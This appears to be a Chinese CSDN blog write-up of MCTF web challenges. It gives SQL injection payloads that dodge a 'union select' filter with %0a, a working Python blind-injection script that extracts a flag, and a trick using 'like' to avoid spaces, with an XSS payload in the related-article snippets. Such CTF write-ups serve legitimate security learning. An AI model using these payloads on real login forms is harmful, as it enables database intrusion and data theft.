MCTF Web 的一些题目

最新推荐文章于 2022-10-01 21:42:52 发布
最新推荐文章于 2022-10-01 21:42:52 发布
阅读量611 收藏
点赞数
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35078631/article/details/78587457
版权

之前本来写好了博客自己给删了…mmp,简单在记录一下思路

注入正传

打开是一个登陆页面,尝试了一下,如果被过滤会提示”hacker?”,然而感觉过滤的并不多
但是这个题的难点是在于注入的当前表没有数据,所以无论怎么闭合都是username error

猜测是

select * from users where username='$username' and password='$password'

构造如下

username = admin' union select 1,2
password = 1

其中有个问题,没过滤union 、select,但是union select就不行,中间加上%0a、%0b或者tab什么的
然后就能发现

username = admin' union%0aselect 1,2
password = 1
返回值是password error

username = admin' union%0aselect 1,2
password = 2
没有回显

然后就可以注入了!

import requests
url = 'http://114.67.224.31:32769'
def get_slowly(inject):
    flag=''
    for i in range(1,50):
        key=0
        for j in range(33,127):
            temp_inject = "' union  select 1,ascii(substring(("+str(inject)+"),"+str(i)+",1))="+str(j)+"#"
            data = {"username":temp_inject,"password":1}
            content = requests.post(url=url,data=data).content
            if "error" not in content:
                key=1
                flag+=chr(j)
                print flag
                break
        if key==0:
            break
if __name__=='__main__':
    inject = "select flag from flag"
    get_slowly(inject)
#9620cf959a51bdce3ae8ff2849cd8f5b

幸好脚本还没扔用等号比较准确,别用二分了

注入后传

中间是自己试出来了like有个特别好的特性,可以在链接字符串或者指令时候不需要空格(因为这里过滤了*空格没法绕过)
然后就有意思了,我们可以构造如下

什么=a'like(passwd)

这里为啥用passwd,因为正好是通表中的,之前我也是卡在这里,如果非要想知道结构可以利用polygon()这个函数,具体代码我丢了,就是一个盲注的东西,不写脚本了,题目还是很不错的

Assassin__is__me
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
MCTF--MISC
Jason_ZhouYetao的博客
11-26 807
之前结束了我们学校的校赛,为了师弟更好的学,那就出个详细的wp吧,首先先讲杂项MISC,这次的MISC其实还是非常简单的。 一笔画完 这题其实只是一个简单的编程题,运用的思想就是递归,这个题不多解释,直接给出脚本: #!/usr/bin/env python # encoding: utf-8 from pwn import * # * 0 # # 2 # . 1 p=re...
prompt(1) to win -----XSS学习笔记
Assassin
08-13 1万+
一直不是很懂XSS,所以这里专门来学习一下下!记录做题的过程嗯。规则是当想办法嵌入prompt(1) 就算胜利了第0关什么过滤都没有,payload如下"><script>prompt(1)</script><"第1关—<> 过滤function escape(input) { // tags stripping mechanism from ExtJS library // Ext
安霸平台_MCTF调试思路
sinat_29634715的博客
02-27 1493
MCTF也叫3D降噪,检测运动区域(阴影变化和真实motion的区分,以应对复杂的光照条件),静止区域;运动区域采用时域降噪,静止区域采用空域降噪。 Motion Detection运动检测: 1.temporal_adjust(TA)和motion_detect,其中motion_detect检测更加稳定准确,性能消耗高。 2.noise_base和motion_response:noise_base越大,越容易被判断为静止;motion_response越大,越容易被判断为运动。???两个..
H.266/VVC技术学习:运动补偿时域滤波器(motion compensated temporal filter )
BigDream123的博客
03-19 4186
运动补偿时域滤波器(Motion compensated temporal filter,MCTF) VTM 支持运动补偿时域滤波器(Motion compensated temporal filter,MCTF)。MCTF是一种编码前处理工具,即当视频帧进行编码前,对该帧进行时域滤波。该工具由CTC中的TemporalFilter选项控制是否开启。 滤波过程 Step1: 通过使用一个或多个TemporalFilterStrengthFrame#配置选项,可以针对每个GOP中的不同图片调整时域滤波
[MCTF] 2021校赛题解
mid2dog
06-07 1207
题解前言Diffcultrepwn日站webpwnmiscReverse 前言 这次比赛有点感觉了,但在第三道pwn上卡了一个小时没出来… 早知道去做逆向了,还是太菜了555,师兄送的分都没拿 20这届师弟还是nice的,就是起步晚了点,师弟们加油 Diffcult 这次应该挑战下这三道diffcult题目的,感觉都能做…明年没机会了 re 第一步查壳,拖进upx里脱壳 然后就可以拖ida里 pwn 看给的hint是ret2dl-runtime-resolve,属于高阶rop里的内容,还没学,之后会再
MCTF--PWN
Jason_ZhouYetao的博客
12-06 1069
被催了好久的PWN的WP,那今天就写一下前一段时间我们校赛的PWN题的详解吧。 猜猜标志 直接输入大量的字符溢出就有标志了, 走后门吗? 做PWN嘛,第一步当然显示checksec一波,可以看到这个还是对萌新很友好的,虽然是一个64位的程序,但是什么保护措施都没有开,这样的话,方法就都可以运用了; 第二步,就是扔到对应的64位的IDA中去看一波伪代码,在函数栏发现了一个好东西...
(调试)图像调试基本术语
刘哈哈哈先生的博客
07-22 2万+
图像调试基本术语 镜头光学 焦距 与光轴平行的光线射入到凸透镜时,理想的镜头应该是所有的光线聚集到一点,再以锥形扩散开来,这个聚集所有光线的一点,就叫做焦点。焦点距镜头中心的距离,或者在Camera中,镜头光学中心到成像平面(CCD或CMOS)的距离成为焦距。 弥散圆 在焦点前后,光线开始聚集和扩散,点的影像变成模糊的,形成一个扩大的圆,这个圆叫做弥散圆。如果弥散圆的直径小于人眼的鉴别能力...
CTFweb题型
qq_35033983的博客
11-17 1万+
web题型总结
一种低复杂度运动补偿时间滤波新策略研究
02-23
针对传统运动补偿时间滤波(MCTF)结构存在着编码速度慢的缺点,提出了一种新的基于低复杂度的运动补偿时间滤波结构。此结构实现了对传统MCTF结构的优化,并精简了传统MCTF的计算步骤,同时给出了一种运动向量多重预测的方法,并通过连续帧间运动向量预测与运动向量多重预测门限值参数AE的选择,实现了对编码计算复杂度的控制。实验数据表明,此结构编码时间比传统MCTF结构缩短约12%
【CTF WEB】文件包含
weixin_30949361的博客
09-29 544
文件包含 题目要求: 请找到题目中FLAG 漏洞源码 <meta charset='utf-8'> <center><h1>文件阅读器</h1></center> <!-- 据说flag在flag.php里 --> <?php error_reporting(0); $f=$_GET['file']; if(s...
计算机二级web题目(1)--web基础
叶绿体不忘呼吸
07-22 3313
说明:以下是学习笔记,尽量精炼。
实验吧 加了料的报错注入 再见报错注入
Assassin
01-31 1971
本题怎么说,细思之下并不是很难,为什么记录一下,一个是之前对报错注入的利用方式实在是太过于简单,简直不知道怎么用,一个是确实手生了很多吧。 言归正传,这个题目还是一般有意思的(不是我自己做的,但是想记录一下) 现在还是体会到了动手之前要把准备工作准备好了 首先看一下界面,随手输入一直显示注入失败,而且我们看到了网页中的提示sql语句是<!-- $sql="select * from users
二级Web程序设计考试大纲(2013年版)
福优学苑@音视频+流媒体
08-27 695
全国计算机等级考试二级Web程序设计考试大纲(2013年版) 转自:全国计算机等级考试,计算机二级,免费培训,免费视频教程,永久免费,免费培训IT  基本要求         1. 理解Web工作原理,了解Web技术基础。          2. 理解超文本传输协议HTTP的基本概念和模型,掌握HTTP的消息格式、常用消息头、请求消息和常用请求方法、响
攻防世界web题总结A
MIGENGKING的博客
08-06 580
题1: 思路:题目说右键用不了,因为打开右键可以查看网页的代码,所以我们要想办法打开网页大源代码: 复制链接在浏览器上打开: 因为右键用不了:我们可以按一下快捷键: 1):可以直接按“F12”(不过有些电脑不可以,需要按“Fn+F12”) 2):直接按“Ctrl+u” 打开源代码后发现了flag的一般形式:所以就去验证然后就对了。这道题很简单。 题2: 题目应该是get和post传参: PO...
web_ctf 题型总结
qq_42812036的博客
09-28 6051
title: web ctf总结 date: 2018-05-30 tags: categories: webctf ctf 常见套路总结01、 工具集02、 常用套路总结003、 php弱类型004、 绕 WAF 01、 工具集 基础工具 -Brupsuite -Python -Fiorefox 扫描工具 -御剑 -Nmap -AWVS 文件上传工具 -菜刀、ck...
XML的SVG知识总结
zyz00000000的博客
09-17 7028
1. SVG (Scalable Vector Graphic)可缩放矢量图形 svg是使用 XML 来描述二维图形和绘图程序的语言,是个行级标签 场景:图标、图标icon、动效、矢量图(放大后不失真)  注意:canvas是js控件,运行性能比svg标签好 2. svg在HTML中的用法 (1)可以通过头部引入css文件(最好使用这种) (2)可以写在style标签中 (3)可以写...
时域滤波和频域滤波
热门推荐
mogebuyi的博客
09-06 3万+
一直都分不清楚时域滤波和频域滤波那个比较好? 一直都分不清楚时域滤波和频域滤波那个比较好?时域滤波就是通过FIR或者IIR滤波,频域滤波就是先FFT去掉不想要的成分在IFFT,一直觉得频域滤波就像是一个理想滤波器一样?对于一些离线信号的处理或者对于资源没有要求的数据处理是不是就考虑频域滤波就好了?希望指教   https://blog.csdn.net/zizi7/article/detai...
php://filter技术分享
Pz_mstr's Blog
10-13 4392
0x00 前言php://filter是PHP中的一个协议,利用这个协议我们可以解决一些ctf的题目,或者挖掘出一些漏洞。0x01 php://filterphp://filter可以作为一个中间流来处理其他流,具有四个参数: 名称 描述 备注 resource=<要过滤的数据流> 指定了你要筛选过滤的数据流。 必选 read=<读链的筛选列表> 可以设定一个或多个过滤
视频前处理:时域滤波MCTF技术学习
最新发布
zzy_pphz的博客
10-01 3862
时域滤波MCTF(Motion Compensated Temporal Filter)原理解析
MCTF -- CRYPTO
Jason_ZhouYetao的博客
11-26 759
密码学的题,这次也都是最基础的题,除了RSA有些难度需要理解之外,其他的都是最基础的古典密码 # 首先看到“#”,就想到了栅栏密码,看到密码是“TWhMRUNlTHBUZV99RnBze19sc2FF”,很明显的基加密,解密之后得到“MhLECeLpTe_} Fps {_lsaE”,这边已经有点旗的格式了,所以直接百度栅栏在线解密,给出在线解密的网址 https://www.qqxiuzi....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值